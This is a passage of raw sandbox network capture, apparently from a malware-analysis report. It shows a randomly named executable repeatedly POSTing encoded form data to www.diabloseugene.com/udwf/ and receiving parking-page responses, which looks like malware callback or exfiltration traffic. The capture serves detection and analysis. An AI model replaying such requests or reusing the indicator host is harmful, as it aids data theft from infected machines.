                                                                                                                            Nov 10, 2023 09:28:23.815623999 CET179INData Raw: 62 61 63 6b 67 72 6f 75 6e 64 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 30 2e 37 64 65 67 2c 23 65 39 65 64 66 62 20 2d 35 30 2e 32 31 25 2c 23 66 36 66 38 66 64 20 33 31 2e 31 31 25 2c 23 66 66 66 20 31 36 36 2e 30 32 25 29 7d 68 31
                                                                                                                            Data Ascii: background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600!important;color:#333}h2{font-size:24px;font-weight:600}h3{font-size:22px;font-w
                                                                                                                            Nov 10, 2023 09:28:23.815680981 CET181INData Raw: 76 3e 6c 69 3e 61 20 69 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 2d 62 61 72 20 69 6d 67 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 74 6f 70 3a 33 70 78 7d 2e 63 6f 6e 67 72 61 74 7a 7b 6d 61 72 67 69 6e 3a
                                                                                                                            Data Ascii: v>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-container{display:flex;flex-direction:row}.message-subtitle{color:#2f1c6a;font-weight:700;font-size:24px;line-height:32px;margin-bo
                                                                                                                            Nov 10, 2023 09:28:23.815720081 CET182INData Raw: 31 36 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 32 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 32 30 70 78 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61
                                                                                                                            Data Ascii: 16px;min-height:20px;min-width:20px;vertical-align:middle;text-align:center;display:inline-block;padding:4px 8px;font-weight:700;border-radius:4px;background-color:#fc5185}@media screen and (max-width:768px){.message{width:100%;padding:35px 0}
                                                                                                                            Nov 10, 2023 09:28:23.815761089 CET183INData Raw: 3e 3c 69 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 74 72 75 65 20 63 6c 61 73 73 3d 22 66 61 73 20 66 61 2d 67 72 61 64 75 61 74 69 6f 6e 2d 63 61 70 22 3e 3c 2f 69 3e 20 54 75 74 6f 72 69 61 6c 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68
                                                                                                                            Data Ascii: ><i aria-hidden=true class="fas fa-graduation-cap"></i> Tutorials</a></li><li><a href=https://support.hostinger.com/en/ rel=nofollow><i aria-hidden=true class="fa-readme fab"></i>Knowledge base</a></li><li><a href=https://www.hostinger.com/aff
                                                                                                                            Nov 10, 2023 09:28:23.815800905 CET185INData Raw: 63 65 73 73 66 75 6c 20 6f 6e 6c 69 6e 65 20 70 72 6f 6a 65 63 74 73 2e 3c 2f 70 3e 3c 62 72 3e 3c 61 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 6f 73 74 69 6e 67 65 72 2e 63 6f 6d 20 72 65 6c 3d 6e 6f 66 6f 6c 6c 6f 77 3e 46 69 6e
                                                                                                                            Data Ascii: cessful online projects.</p><br><a href=https://www.hostinger.com rel=nofollow>Find your hosting plan</a></div></div><div class="col-xs-12 col-sm-4 column-custom-wrap"><div class=column-custom><div class=column-title>Add website to your hostin
                                                                                                                            Nov 10, 2023 09:28:23.815839052 CET186INData Raw: 6e 3c 74 3b 29 7b 69 66 28 35 35 32 39 36 3d 3d 28 36 33 34 38 38 26 28 72 3d 6f 5b 6e 2b 2b 5d 29 29 29 74 68 72 6f 77 20 6e 65 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 55 54 46 2d 31 36 28 65 6e 63 6f 64 65 29 3a 20 49 6c 6c 65 67 61 6c 20 55
                                                                                                                            Data Ascii: n<t;){if(55296==(63488&(r=o[n++])))throw new RangeError("UTF-16(encode): Illegal UTF-16 value");65535<r&&(r-=65536,e.push(String.fromCharCode(r>>>10&1023|55296)),r=56320|1023&r),e.push(String.fromCharCode(r))}return e.join("")}};var o=36,r=214
                                                                                                                            Nov 10, 2023 09:28:23.815876961 CET187INData Raw: 69 66 28 74 29 66 6f 72 28 66 3d 30 2c 77 3d 6d 2e 6c 65 6e 67 74 68 3b 66 3c 77 3b 66 2b 2b 29 79 5b 66 5d 26 26 28 6d 5b 66 5d 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6d 5b 66 5d 29 2e 74 6f 55 70 70 65 72 43 61 73 65 28
                                                                                                                            Data Ascii: if(t)for(f=0,w=m.length;f<w;f++)y[f]&&(m[f]=String.fromCharCode(m[f]).toUpperCase().charCodeAt(0));return this.utf16.encode(m)},this.encode=function(t,a){var h,f,i,c,u,d,l,p,g,s,C,w;a&&(w=this.utf16.decode(t));var v=(t=this.utf16.decode(t.toLo
                                                                                                                            Nov 10, 2023 09:28:23.815913916 CET188INData Raw: 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 70 61 74 68 4e 61 6d 65 22 29 3b 61 63 63 6f 75 6e 74 2e 69 6e 6e 65 72 48 54 4d 4c 3d 70 75 6e 79 63 6f 64 65 2e 54 6f 55 6e 69 63 6f 64 65 28 70 61 74 68 4e 61 6d 65 29 3c 2f 73
                                                                                                                            Data Ascii: ument.getElementById("pathName");account.innerHTML=punycode.ToUnicode(pathName)</script>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                            13192.168.2.1049728199.59.243.22580C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                            Nov 10, 2023 09:28:29.144850016 CET189OUTPOST /udwf/ HTTP/1.1
                                                                                                                            Host: www.diabloseugene.com
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Origin: http://www.diabloseugene.com
                                                                                                                            Referer: http://www.diabloseugene.com/udwf/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 188
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: no-cache
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                            Data Raw: 47 30 59 78 64 32 51 3d 55 34 5a 36 74 6d 34 46 78 6f 6a 74 58 4c 4f 6e 2f 34 54 34 41 45 73 37 56 38 79 73 47 7a 67 47 49 6f 57 61 37 67 72 35 6f 47 51 69 70 37 31 78 4c 61 64 41 54 76 42 56 4b 6a 78 67 39 76 30 41 61 49 53 7a 70 6c 43 50 63 44 53 70 70 38 44 39 49 6d 4e 2b 37 7a 77 53 78 6b 76 6d 41 4c 42 30 55 49 63 55 32 4c 69 57 4f 44 68 49 32 67 57 78 66 46 6c 5a 4b 5a 30 50 39 63 54 6e 35 6b 56 78 68 2f 6c 44 74 4e 34 6a 6f 30 4a 6e 6d 4d 4e 75 49 34 70 45 56 2b 39 68 50 4b 55 51 68 74 42 55 78 51 31 50 44 69 31 37 43 34 42 78 4a 6e 36 66 61 77 3d 3d
                                                                                                                            Data Ascii: G0Yxd2Q=U4Z6tm4FxojtXLOn/4T4AEs7V8ysGzgGIoWa7gr5oGQip71xLadATvBVKjxg9v0AaISzplCPcDSpp8D9ImN+7zwSxkvmALB0UIcU2LiWODhI2gWxfFlZKZ0P9cTn5kVxh/lDtN4jo0JnmMNuI4pEV+9hPKUQhtBUxQ1PDi17C4BxJn6faw==
                                                                                                                            Nov 10, 2023 09:28:29.418311119 CET191INHTTP/1.1 200 OK
                                                                                                                            date: Fri, 10 Nov 2023 08:28:28 GMT
                                                                                                                            content-type: text/html; charset=utf-8
                                                                                                                            content-length: 1109
                                                                                                                            x-request-id: 8f8fcc29-11bc-4b7c-a6ba-031e1fd6e9d6
                                                                                                                            cache-control: no-store, max-age=0
                                                                                                                            accept-ch: sec-ch-prefers-color-scheme
                                                                                                                            critical-ch: sec-ch-prefers-color-scheme
                                                                                                                            vary: sec-ch-prefers-color-scheme
                                                                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_utrfvT18rLbkeWw3m+7aR4sW5K9D3ILMt3IRjGq+Uvf2ZaEZaFIKFbYzks2ocpn/4rY4FmPl0q6B7hNzo7390w==
                                                                                                                            set-cookie: parking_session=8f8fcc29-11bc-4b7c-a6ba-031e1fd6e9d6; expires=Fri, 10 Nov 2023 08:43:29 GMT; path=/
                                                                                                                            connection: close
                                                                                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 75 74 72 66 76 54 31 38 72 4c 62 6b 65 57 77 33 6d 2b 37 61 52 34 73 57 35 4b 39 44 33 49 4c 4d 74 33 49 52 6a 47 71 2b 55 76 66 32 5a 61 45 5a 61 46 49 4b 46 62 59 7a 6b 73 32 6f 63 70 6e 2f 34 72 59 34 46 6d 50 6c 30 71 36 42 37 68 4e 7a 6f 37 33 39 30 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 41 45 41 41 41 41 42 43 41 49 41 41 41 43 51 64 31 50 65 41 41 41 41 44 45 6c 45 51 56 51 49 31 32 50 34 2f 2f 38 2f 41 41 58 2b 41 76 37 63 7a 46 6e 6e 41 41 41 41 41 45 6c 46 54 6b
                                                                                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_utrfvT18rLbkeWw3m+7aR4sW5K9D3ILMt3IRjGq+Uvf2ZaEZaFIKFbYzks2ocpn/4rY4FmPl0q6B7hNzo7390w==" lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTk
                                                                                                                            Nov 10, 2023 09:28:29.418328047 CET191INData Raw: 53 75 51 6d 43 43 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68
                                                                                                                            Data Ascii: SuQmCC"> <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiOGY4ZmNjMjktMTFiYy00YjdjLWE2YmEtMDMxZTFmZDZlOWQ2IiwicGFnZV90aW1lIjoxNjk


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                            14192.168.2.1049729199.59.243.22580C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                            Nov 10, 2023 09:28:33.133064985 CET192OUTPOST /udwf/ HTTP/1.1
                                                                                                                            Host: www.diabloseugene.com
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Origin: http://www.diabloseugene.com
                                                                                                                            Referer: http://www.diabloseugene.com/udwf/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 208
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: no-cache
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                            Data Raw: 47 30 59 78 64 32 51 3d 55 34 5a 36 74 6d 34 46 78 6f 6a 74 47 62 2b 6e 73 4a 54 34 51 55 73 6b 51 38 79 73 49 54 67 43 49 6f 4b 61 37 68 76 70 6f 54 41 69 70 65 78 78 4b 66 39 41 51 76 42 56 46 44 77 72 67 66 30 4c 61 49 65 4e 70 6b 2b 50 63 44 32 70 70 39 7a 39 49 52 5a 39 30 44 77 4d 6b 30 76 34 45 4c 42 30 55 49 63 55 32 4c 32 38 4f 44 35 49 32 51 6d 78 66 6b 6c 61 57 4a 30 4d 74 4d 54 6e 39 6b 56 74 68 2f 6b 6d 74 4d 6c 72 6f 78 56 6e 6d 4d 39 75 4a 74 64 46 66 2b 38 6f 41 71 56 68 6f 73 34 61 2f 69 6c 74 48 44 56 56 55 2b 73 35 49 79 57 4d 64 45 70 4d 62 51 45 77 30 78 6e 38 4f 47 44 2b 50 61 79 43 4d 35 4d 3d
                                                                                                                            Data Ascii: G0Yxd2Q=U4Z6tm4FxojtGb+nsJT4QUskQ8ysITgCIoKa7hvpoTAipexxKf9AQvBVFDwrgf0LaIeNpk+PcD2pp9z9IRZ90DwMk0v4ELB0UIcU2L28OD5I2QmxfklaWJ0MtMTn9kVth/kmtMlroxVnmM9uJtdFf+8oAqVhos4a/iltHDVVU+s5IyWMdEpMbQEw0xn8OGD+PayCM5M=
                                                                                                                            Nov 10, 2023 09:28:33.343295097 CET194INHTTP/1.1 200 OK
                                                                                                                            date: Fri, 10 Nov 2023 08:28:32 GMT
                                                                                                                            content-type: text/html; charset=utf-8
                                                                                                                            content-length: 1109
                                                                                                                            x-request-id: 5ffef964-b789-4de2-96a6-a6e5facc98bb
                                                                                                                            cache-control: no-store, max-age=0
                                                                                                                            accept-ch: sec-ch-prefers-color-scheme
                                                                                                                            critical-ch: sec-ch-prefers-color-scheme
                                                                                                                            vary: sec-ch-prefers-color-scheme
                                                                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_utrfvT18rLbkeWw3m+7aR4sW5K9D3ILMt3IRjGq+Uvf2ZaEZaFIKFbYzks2ocpn/4rY4FmPl0q6B7hNzo7390w==
                                                                                                                            set-cookie: parking_session=5ffef964-b789-4de2-96a6-a6e5facc98bb; expires=Fri, 10 Nov 2023 08:43:33 GMT; path=/
                                                                                                                            connection: close
                                                                                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 75 74 72 66 76 54 31 38 72 4c 62 6b 65 57 77 33 6d 2b 37 61 52 34 73 57 35 4b 39 44 33 49 4c 4d 74 33 49 52 6a 47 71 2b 55 76 66 32 5a 61 45 5a 61 46 49 4b 46 62 59 7a 6b 73 32 6f 63 70 6e 2f 34 72 59 34 46 6d 50 6c 30 71 36 42 37 68 4e 7a 6f 37 33 39 30 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 41 45 41 41 41 41 42 43 41 49 41 41 41 43 51 64 31 50 65 41 41 41 41 44 45 6c 45 51 56 51 49 31 32 50 34 2f 2f 38 2f 41 41 58 2b 41 76 37 63 7a 46 6e 6e 41 41 41 41 41 45 6c 46 54 6b
                                                                                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_utrfvT18rLbkeWw3m+7aR4sW5K9D3ILMt3IRjGq+Uvf2ZaEZaFIKFbYzks2ocpn/4rY4FmPl0q6B7hNzo7390w==" lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTk
                                                                                                                            Nov 10, 2023 09:28:33.343338013 CET194INData Raw: 53 75 51 6d 43 43 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68
                                                                                                                            Data Ascii: SuQmCC"> <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNWZmZWY5NjQtYjc4OS00ZGUyLTk2YTYtYTZlNWZhY2M5OGJiIiwicGFnZV90aW1lIjoxNjk


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                            15192.168.2.1049730199.59.243.22580C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                            Nov 10, 2023 09:28:35.810514927 CET197OUTPOST /udwf/ HTTP/1.1
                                                                                                                            Host: www.diabloseugene.com
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Origin: http://www.diabloseugene.com
                                                                                                                            Referer: http://www.diabloseugene.com/udwf/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 1220
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: no-cache
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                            Data Raw: 47 30 59 78 64 32 51 3d 55 34 5a 36 74 6d 34 46 78 6f 6a 74 47 62 2b 6e 73 4a 54 34 51 55 73 6b 51 38 79 73 49 54 67 43 49 6f 4b 61 37 68 76 70 6f 51 67 69 6f 73 35 78 4c 35 31 41 52 76 42 56 4d 6a 78 73 67 66 30 61 61 4a 32 42 70 6b 7a 34 63 42 65 70 76 66 4c 39 42 45 31 39 76 7a 77 4d 37 45 76 6c 41 4c 42 39 55 49 4d 51 32 4c 6d 38 4f 44 35 49 32 53 2b 78 59 31 6c 61 47 35 30 50 39 63 53 6d 35 6b 56 4a 68 2f 39 62 74 4d 67 4a 70 46 5a 6e 6d 73 74 75 4c 62 78 46 58 2b 38 6d 46 71 56 35 6f 74 45 52 2f 69 35 68 48 48 55 34 55 38 38 35 4c 48 75 62 5a 48 5a 4a 4f 79 38 56 72 43 6a 6a 44 42 75 75 4c 59 65 62 55 66 4a 4c 34 52 77 4b 68 4b 53 6d 58 44 76 2f 6e 53 65 57 4b 71 79 57 44 6f 73 6c 6d 75 72 44 38 75 75 6c 6d 55 41 55 72 52 35 4b 44 33 4b 7a 6d 35 6b 62 50 31 45 65 58 49 46 47 64 32 50 38 42 39 6c 4d 7a 43 37 32 43 70 66 44 6d 6a 47 4b 7a 6e 42 6a 4a 46 38 52 76 4d 44 41 6d 54 4b 71 33 51 67 6a 65 50 67 77 4e 59 6c 62 65 41 2b 4f 49 6e 43 56 61 63 6e 2f 72 50 68 34 36 49 68 33 76 43 4a 4c 75 33 35 53 52 33 49 32 6c 66 71 6f 4c 6c 72 6f 51 39 59 77 5a 7a 59 4b 62 56 77 36 6e 31 79 75 6f 45 72 67 37 77 71 4a 74 75 31 2b 44 70 36 6c 58 75 52 75 38 6b 4f 71 71 58 58 50 6c 4d 78 68 6f 52 6a 51 62 59 38 6f 76 48 76 32 68 71 30 61 49 73 51 35 34 32 55 41 66 4d 56 68 78 45 70 41 2b 6d 75 55 42 6f 4b 53 5a 41 5a 78 43 59 69 64 74 2b 56 73 45 67 74 4b 6e 62 37 67 33 52 4c 56 30 64 66 73 42 4b 31 7a 39 71 61 6f 4f 51 67 52 6b 49 42 58 48 36 70 55 35 63 62 62 78 61 4e 4e 4b 69 74 45 6d 79 31 66 63 4f 79 49 56 4f 57 38 4d 52 33 64 39 72 4a 4d 72 38 38 51 4c 5a 68 45 67 79 53 4d 75 77 38 4f 49 68 46 71 55 6c 62 61 71 70 74 72 54 56 2b 71 4c 34 58 79 74 45 32 79 43 6d 4c 56 56 6b 57 64 4b 39 64 46 68 48 6f 4b 48 66 6b 6c 64 41 64 2b 4f 4f 55 31 6b 48 6e 4a 48 46 69 74 49 76 6a 44 35 7a 67 61 6c 44 67 47 47 6d 6c 48 52 6e 75 74 47 49 69 5a 4b 37 48 6e 68 4a 75 73 54 7a 2f 75 74 42 57 4c 71 45 6c 52 59 68 4a 32 51 6a 56 78 4e 6e 50 55 45 43 33 78 76 39 65 63 72 44 32 73 6a 34 71 4c 53 73 71 4a 37 59 6b 46 75 4d 36 56 59 2f 34 52 66 33 52 5a 4b 6c 2b 63 77 54 61 31 48 6a 57 6e 6b 70 6c 4d 70 68 76 78 54 73 79 31 69 58 71 71 53 47 6c 54 32 6b 6e 56 35 2b 73 6f 48 6e 2f 6e 52 47 34 77 57 55 51 71 32 6e 30 53 6a 78 70 65 74 42 65 42 2f 58 78 37 4a 4c 4e 6e 4d 44 2b 72 77 30 62 64 56 47 53 30 45 4e 71 63 52 4f 2b 38 6c 38 51 36 5a 71 64 61 64 62 62 6b 59 66 39 2f 50 6d 49 6d 46 61 50 57 41 34 49 66 55 52 6b 6b 6c 5a 79 56 4b 57 79 38 31 53 50 31 53 34 76 36 58 77 6b 53 31 67 77 2b 4b 5a 75 42 52 4f 4c 70 4c 78 76 45 38 69 31 6f 2b 77 4f 45 67 51 79 33 76 41 64 50 59 56 68 39 6e 64 5a 76 32 4d 39 52 31 31 69 55 59 41 71 41 35 58 62 31 43 6b 30 64 6b 56 59 2f 49 36 48 41 6f 55 54 41 33 4f 45 39 44 73 47 41 6c 6a 6c 38 76 57 30 34 4e 75 53 70 55 61 4a 31 41 44 32 4c 4b 72 45 68 31 64 33 41 69 57 54 36 43 79 66 6e 55 52 45 45 73 30 69 33 45 62 76 6c 5a 37 4d 47 61 4e 77 69 70 75 4c 4f 65 76 42 77 4e 4b 35 73 46 52 72 70 67 48 79 76 79 38 2b 64 35 50 71 72 2f 50 58 30 66 4d 54 68 52 34 68 31 6c 6b 75 57 54 4b 78 57 39 4e 46 4d 4c 48 47 52 39 35 46 75 36 46 56 54 6c 6a 2f 6d 4c 48 75 67 49 78 71 53 2b 79 38 31 37 70 35 67 34 2f 45 67 48 2b 63 45 53 43 54 39 6e 35 67 74 68 79 6b 5a 6d 79 46 4b 37 43 31 62 4d 59 61 5a 50 6f 71 65 4a 66 44 33 51 4d 6d 49 44 39 79 57 75 67 33 52 44 5a 56 75 79 74 59 79 7a 6c 49 50 70 50 61 46 43 50 6e 58 45 33 7a 4f 77 50 36 32 30 51 33 45 48 70 4b 63 42 45 44 45 59 7a 4c 38 35 74 4f 6d 74 78 53 50 6f 71 39 52 77 66 63 51 39 42 36 41 7a 47 6d 6d 59 70 2b 31 6e 6d 37 57 52 57 6c 30 38 55 7a 6b 74 70 64 4b 48 4e 6e 5a 32 38 66 68 6d 37 4a 6b 72 45 50 79 30 73 69 4d 38 67 33 6c 39 47 6d 4e
                                                                                                                            Data Ascii: G0Yxd2Q=U4Z6tm4FxojtGb+nsJT4QUskQ8ysITgCIoKa7hvpoQgios5xL51ARvBVMjxsgf0aaJ2Bpkz4cBepvfL9BE19vzwM7EvlALB9UIMQ2Lm8OD5I2S+xY1laG50P9cSm5kVJh/9btMgJpFZnmstuLbxFX+8mFqV5otER/i5hHHU4U885LHubZHZJOy8VrCjjDBuuLYebUfJL4RwKhKSmXDv/nSeWKqyWDoslmurD8uulmUAUrR5KD3Kzm5kbP1EeXIFGd2P8B9lMzC72CpfDmjGKznBjJF8RvMDAmTKq3QgjePgwNYlbeA+OInCVacn/rPh46Ih3vCJLu35SR3I2lfqoLlroQ9YwZzYKbVw6n1yuoErg7wqJtu1+Dp6lXuRu8kOqqXXPlMxhoRjQbY8ovHv2hq0aIsQ542UAfMVhxEpA+muUBoKSZAZxCYidt+VsEgtKnb7g3RLV0dfsBK1z9qaoOQgRkIBXH6pU5cbbxaNNKitEmy1fcOyIVOW8MR3d9rJMr88QLZhEgySMuw8OIhFqUlbaqptrTV+qL4XytE2yCmLVVkWdK9dFhHoKHfkldAd+OOU1kHnJHFitIvjD5zgalDgGGmlHRnutGIiZK7HnhJusTz/utBWLqElRYhJ2QjVxNnPUEC3xv9ecrD2sj4qLSsqJ7YkFuM6VY/4Rf3RZKl+cwTa1HjWnkplMphvxTsy1iXqqSGlT2knV5+soHn/nRG4wWUQq2n0SjxpetBeB/Xx7JLNnMD+rw0bdVGS0ENqcRO+8l8Q6ZqdadbbkYf9/PmImFaPWA4IfURkklZyVKWy81SP1S4v6XwkS1gw+KZuBROLpLxvE8i1o+wOEgQy3vAdPYVh9ndZv2M9R11iUYAqA5Xb1Ck0dkVY/I6HAoUTA3OE9DsGAljl8vW04NuSpUaJ1AD2LKrEh1d3AiWT6CyfnUREEs0i3EbvlZ7MGaNwipuLOevBwNK5sFRrpgHyvy8+d5Pqr/PX0fMThR4h1lkuWTKxW9NFMLHGR95Fu6FVTlj/mLHugIxqS+y817p5g4/EgH+cESCT9n5gthykZmyFK7C1bMYaZPoqeJfD3QMmID9yWug3RDZVuytYyzlIPpPaFCPnXE3zOwP620Q3EHpKcBEDEYzL85tOmtxSPoq9RwfcQ9B6AzGmmYp+1nm7WRWl08UzktpdKHN